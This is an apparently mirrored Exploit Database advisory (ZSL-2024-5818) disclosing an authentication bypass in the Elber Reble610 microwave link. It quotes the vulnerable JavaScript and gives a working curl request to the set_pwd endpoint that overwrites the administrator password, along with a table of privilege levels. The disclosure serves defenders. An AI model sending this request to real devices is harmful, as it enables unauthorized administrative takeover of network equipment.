Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link – Authentication Bypass

• Exploit Database
• 47 阅读

• 作者： LiquidWorm
  日期： 2024-05-04
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/52006/

• Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass
  
  
  Vendor: Elber S.r.l.
  Product web page: https://www.elber.it
  Affected version: 0.01 Revision 0
  
  Summary: The REBLE610 features an accurate hardware design, absence of
  internal cabling and full modularity. The unit is composed by a basic
  chassis with 4 extractable boards which makes maintenance and critical
  operations, like frequency modification, easy and efficient. The modular
  approach has brought to the development of the digital processing module
  (containing modulator, demodulator and data interface) and the RF module
  (containing Transmitter, Receiver and channel filters). From an RF point
  of view, the new transmission circuitry is able to guarantee around 1 Watt
  with every modulation scheme, introducing, in addition, wideband precorrection
  (up to 1GHz depending on frequency band).
  
  Desc: The device suffers from an authentication bypass vulnerability through
  a direct and unauthorized access to the password management functionality. The
  issue allows attackers to bypass authentication by manipulating the set_pwd
  endpoint that enables them to overwrite the password of any user within the
  system. This grants unauthorized and administrative access to protected areas
  of the application compromising the device's system security.
  
  --------------------------------------------------------------------------
  /modules/pwd.html
  ------------------
  50: function apply_pwd(level, pwd)
  51: {
  52: 	$.get("json_data/set_pwd", {lev:level, pass:pwd},
  53: 	function(data){
  54: 		//$.alert({title:'Operation',text:data});
  55: 		show_message(data);
  56: 	}).fail(function(error){
  57: 		show_message('Error ' + error.status, 'error');
  58: 	});
  59: }
  
  --------------------------------------------------------------------------
  
  Tested on: NBFM Controller
   embOS/IP
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2024-5818
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php
  
  
  18.08.2023
  
  --
  
  
  $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
  
  Ref (lev param):
  
  Level 7 = SNMP Write Community (snmp_write_pwd)
  Level 6 = SNMP Read Community (snmp_read_pwd)
  Level 5 = Custom Password? hidden. (custom_pwd)
  Level 4 = Display Password (display_pwd)?
  Level 2 = Administrator Password (admin_pwd)
  Level 1 = Super User Password (puser_pwd)
  Level 0 = User Password (user_pwd)